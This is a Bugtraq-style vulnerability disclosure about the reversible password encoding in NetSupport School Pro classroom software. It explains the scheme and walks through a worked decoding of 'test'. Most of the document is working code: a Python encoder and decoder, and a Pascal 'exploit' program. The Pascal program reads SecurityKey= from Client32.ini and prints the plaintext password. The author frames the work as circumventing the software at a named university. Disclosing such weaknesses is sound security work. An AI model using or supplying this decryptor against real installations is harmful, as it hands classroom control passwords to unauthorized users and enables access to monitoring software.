NetSupport School Pro: Password Encryption Weaknesses
To the moderator: this is my first Bugtraq posting, feel free to make any
changes you feel necessary to make this more helpful. Thank you very much.
Vendor : NetSupport
URL : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk : Password protection weakness
Description: NetSupport School is a market-leading training tool for the
modern classroom, featuring full student remote control, application and
internet monitoring, customized student testing and more.
Password protection weakness: The password "encryption" is a simple,
easily reversed encoding rather than a one-way hash, so the stored value can
be turned back into the plaintext password. The encoding works as follows:

Each letter of the password is written as a pair of characters in a
hexadecimal-like system. The first character of the pair can be any ASCII
character and acts as the high digit; the second character is the low digit
and runs from A to P (sixteen values, A=0 ... P=15). It carries just like
hex, so AP+1 = BA. It is not case sensitive, which also makes it easier for
kids to get passwords. The alphabet starts at EM, so A = EM, B = EN, and so
on (for example FP = T).

Each letter is also shifted by the number of letters that come after it: the
crypt of "aa" is EN9O (the first letter gets +1), while the crypt of "aaa" is
EO9P>A (the first letter gets +2, the second +1). Each column (position in
the password) also has its own base value. I can figure out the routine used
for the crypt of each column, though. Here is a reference for the letter a
and its crypt in each column: EM, 9O, >A, BC, FE, :G, >I, BK, FM, :O. A
letter in a later column is further shifted by the values of all the letters
before it. Based on the column bases, the hex-like digit system, and the
shift by position, you can get the password from an encrypted one.

An example of a cracked password: the crypt is GC;H@KEO. Column 1: GC - 3
(three letters follow it) = FP in the hex-like system, and FP = T, so the
first letter is T. Column 2: take 9O (the known "a" for the 2nd column) and
add the difference from a to t (19) to it, which gives ;B; add 2 (the number
of letters that follow it) to get ;D; ;H is 4 places past ;D, and A+4 = E,
so the second letter is "E". You continue like this, adding the values of
all the previous letters and the count of letters that follow, until you get
the password "test".
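As an added example (not code from the original post or from NetSupport),
here is the scheme above written in Python in both directions: encode()
builds the stored value from a password using the per-column "a" bases, and
decode() inverts it column by column, so the post's own cases (a -> EM,
aa -> EN9O, aaa -> EO9P>A, test -> GC;H@KEO) can be checked directly. The
column bases for positions 1-10 are the ones quoted above; positions 11-15
are copied from the Pascal decryptor further down in the post. The
Client32.ini text is a constructed sample, not a real file.

```python
# Added example: encoder/decoder for the NetSupport School Pro SecurityKey
# scheme as described in the post. Not code from the original post or from
# NetSupport. Column bases 1-10 are the "a" reference values quoted in the
# post; 11-15 are copied from the Pascal decryptor posted below.

LOW_DIGITS = "ABCDEFGHIJKLMNOP"  # second character of a pair: A=0 ... P=15

# Encoding of the letter "a" in each column (password position); the post
# counts columns from 1, this list is 0-based.
COLUMN_BASES = ["EM", "9O", ">A", "BC", "FE", ":G", ">I", "BK", "FM", ":O",
                "?A", "CC", "GE", ";G", "?I"]

SECURITY_KEY_PREFIX = "SecurityKey="


def pair_to_int(pair):
    """Value of a two-character pair: the first character is the high digit
    (any ASCII character, weight 16), the second the low digit A..P."""
    if len(pair) != 2:
        raise ValueError("a pair is exactly two characters: %r" % (pair,))
    high, low = pair[0], pair[1].upper()
    if low not in LOW_DIGITS:
        raise ValueError("low digit %r is outside A-P" % (pair[1],))
    return ord(high) * 16 + LOW_DIGITS.index(low)


def int_to_pair(value):
    """Inverse of pair_to_int; AP + 1 becomes BA because the carry goes
    into the high character."""
    high, low = divmod(value, 16)
    if not 0 <= high < 128:
        raise ValueError("high character %d is outside ASCII" % high)
    return chr(high) + LOW_DIGITS[low]


def letter_value(ch):
    """Distance of a letter from 'a'; the scheme is not case sensitive."""
    ch = ch.upper()
    if not "A" <= ch <= "Z":
        raise ValueError("only letters are handled here: %r" % (ch,))
    return ord(ch) - ord("A")


def encode(password):
    """Produce the stored SecurityKey for a password.

    Column x of the result is that column's "a" base, plus the number of
    letters that follow position x, plus the values of all letters up to
    and including position x.
    """
    n = len(password)
    if n > len(COLUMN_BASES):
        raise ValueError("only %d column bases are known" % len(COLUMN_BASES))
    out = []
    running = 0  # sum of the letter values seen so far, including this one
    for x, ch in enumerate(password):
        running += letter_value(ch)
        base = pair_to_int(COLUMN_BASES[x])
        out.append(int_to_pair(base + (n - 1 - x) + running))
    return "".join(out)


def decode(key):
    """Recover the (lower-cased) password from a stored SecurityKey by
    undoing encode() one column at a time, left to right."""
    if len(key) % 2:
        raise ValueError("key length must be even")
    n = len(key) // 2
    if n > len(COLUMN_BASES):
        raise ValueError("only %d column bases are known" % len(COLUMN_BASES))
    letters = []
    previous = 0  # sum of the values of the letters already recovered
    for x in range(n):
        value = (pair_to_int(key[2 * x:2 * x + 2])
                 - pair_to_int(COLUMN_BASES[x]) - (n - 1 - x) - previous)
        if not 0 <= value < 26:
            raise ValueError("column %d does not decode to a letter" % (x + 1))
        letters.append(chr(ord("a") + value))
        previous += value
    return "".join(letters)


def extract_security_key(ini_text):
    """Pull the SecurityKey= value out of Client32.ini text, as the Pascal
    program does; returns None when the line is absent."""
    for line in ini_text.splitlines():
        if line.startswith(SECURITY_KEY_PREFIX):
            return line[len(SECURITY_KEY_PREFIX):].strip()
    return None


def recover_password(ini_text):
    key = extract_security_key(ini_text)
    if key is None:
        raise ValueError("no SecurityKey= line in the ini text")
    return decode(key)


# Constructed sample Client32.ini (not a real file); the key is the post's
# own "test" example.
SAMPLE_INI = "[Client]\nName=LAB-PC-01\nSecurityKey=GC;H@KEO\n"

if __name__ == "__main__":
    for pw in ("a", "aa", "aaa", "test"):
        print("%-4s -> %s" % (pw, encode(pw)))
    print("Client32.ini SecurityKey -> %s" % recover_password(SAMPLE_INI))
```

Because decode() only ever subtracts known quantities, anyone who can read
Client32.ini gets the password back exactly, with no guessing; that is the
difference between an encoding and a hash. Note also that a fast unsalted
hash such as MD5 would stop direct reversal but still allow offline guessing
of short classroom passwords; a salted, deliberately slow password hash is
the usual recommendation.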
Solution: based on my research this program uses a hash-type validation
method, so the quickest and most painless solution would be to use an MD5
routine for passwords.
Credits: Credits go to Drexel University and Harry Hoffman, because if they
hadn't used this software I would never have had the urge to circumvent
it ;)
As well as Mr. Flynn for teaching me Pascal (even though it's 20+ years old
it's still my favorite).
Spiffomatic64
Hacking is an art-form
Here is a program that will decrypt the password off a machine with the
software running (old school :-D, it's written in Pascal):
program exploit;
{ NetSupport School Pro password decryptor.
  Reads the SecurityKey= value from Client32.ini and reverses the encoding
  described above: each letter is a two-character base-16 pair (second
  character A..P) shifted by a per-column base, by the number of letters
  that follow it, and by the values of the letters before it. }
uses crt;
const
  maxcols = 15;  { number of per-column base values recorded in "known" }
var
  i,length,x,y,crazy:integer;
  passfile:text;
  line:string;
  password,p:array [1..100] of char;
  known,convert:array [1..26,1..3] of char;
  ch,tempx,tempy:char;

{ build the A..Z -> EM..FP table: column 1 is the high character, column 2
  the low digit (A..P), column 3 the plaintext letter }
procedure conv;
begin
  convert[1,1]:='E';
  convert[1,2]:='M';
  convert[1,3]:='A';
  for i:=2 to 26 do begin
    if convert[i-1,2]='P' then begin      { carry: xP + 1 = (x+1)A }
      convert[i,1]:=chr(ord(convert[i-1,1])+1);
      convert[i,2]:='A';
    end
    else begin
      convert[i,1]:=convert[i-1,1];
      convert[i,2]:=chr(ord(convert[i-1,2])+1);
    end;
    convert[i,3]:=chr(ord(convert[i-1,3])+1);
  end;
end;

{ add num (which may be negative) to the pair (a,b) in the base-16 system,
  carrying or borrowing through the low digit; result is left in tempx,tempy }
procedure hex(a,b:char; num:integer);
begin
  if num>0 then begin
    for i:=1 to num do begin
      if b='P' then begin
        b:='A';
        a:=chr(ord(a)+1);
      end else inc(b);
    end;
  end;
  if num<0 then begin
    for i:=-1 downto num do begin
      if b='A' then begin
        b:='P';
        a:=chr(ord(a)-1);
      end else dec(b);
    end;
  end;
  tempx:=a;
  tempy:=b;
end;

{ look a pair up in the convert table and return the plaintext letter
  (#0 if not found); not used by the main loop, kept for reference }
function compare(a,b:char):char;
begin
  compare:=#0;
  for i:=1 to 26 do begin
    if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
  end;
end;

{ distance from pair (a,b) to pair (c,d), each read as ord(high)*16+low }
function diff(a,b,c,d:char):integer;
var num1,num2:integer;
begin
  num1:=ord(a)*16+ord(b);
  num2:=ord(c)*16+ord(d);
  diff:=num2-num1;
end;

Begin
  clrscr;
  Writeln(' _________________________________________________________');
  Writeln('|NetSupport School Pro Password decryptor                 |');
  Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
  Writeln('|and my wonderful fiance Halley                           |');
  Writeln(' ---------------------------------------------------------');
  Writeln('');

  {get the hash from client32.ini}
  assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
  reset (passfile);
  length:=0;
  i:=0;
  while not eof(passfile) do
  begin
    line:='';
    while not EoLn(passfile) do
    begin
      Read(passfile, ch);
      line:=line+ch;
      if line='SecurityKey=' then begin
        { the rest of this line is the encoded password }
        while not eoln(passfile) do
        begin
          inc(i);
          read(passfile,ch);
          password[i]:=ch;
        end;
        length:=i;
      end;
    end;
    readln(passfile,line);
  end;
  close(passfile);
  if length=0 then begin
    writeln('SecurityKey= not found in Client32.ini');
    halt(1);
  end;
  if length>2*maxcols then begin
    writeln('SecurityKey too long: only ',maxcols,' column bases are known');
    halt(1);
  end;
  write('Hash: ');
  for i:=1 to length do write(password[i]);
  writeln('');

  {decrypt the hash}
  conv;
  { encoding of the letter 'a' in each column: 1-10 from the reference
    above, 11-15 extrapolated from the same pattern }
  known[1,1]:='E';  known[1,2]:='M';
  known[2,1]:='9';  known[2,2]:='O';
  known[3,1]:='>';  known[3,2]:='A';
  known[4,1]:='B';  known[4,2]:='C';
  known[5,1]:='F';  known[5,2]:='E';
  known[6,1]:=':';  known[6,2]:='G';
  known[7,1]:='>';  known[7,2]:='I';
  known[8,1]:='B';  known[8,2]:='K';
  known[9,1]:='F';  known[9,2]:='M';
  known[10,1]:=':'; known[10,2]:='O';
  known[11,1]:='?'; known[11,2]:='A';
  known[12,1]:='C'; known[12,2]:='C';
  known[13,1]:='G'; known[13,2]:='E';
  known[14,1]:=';'; known[14,2]:='G';
  known[15,1]:='?'; known[15,2]:='I';

  { decode column by column: p starts as all 'A' (value 0); for column x,
    undo the shift by the number of letters that follow it and by the values
    of the letters already recovered, then measure the distance from the
    column's 'a' base to get the letter }
  for i:=1 to round(length/2) do p[i]:=chr(65);
  for x:=1 to round(length/2) do begin
    crazy:=-(round(length/2))+x;
    for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
    hex(password[x*2-1],password[x*2],crazy);
    p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
  end;
  writeln('');
  write('Password: ');
  for i:=1 to round(length/2) do write(p[i]);
  readkey;
end.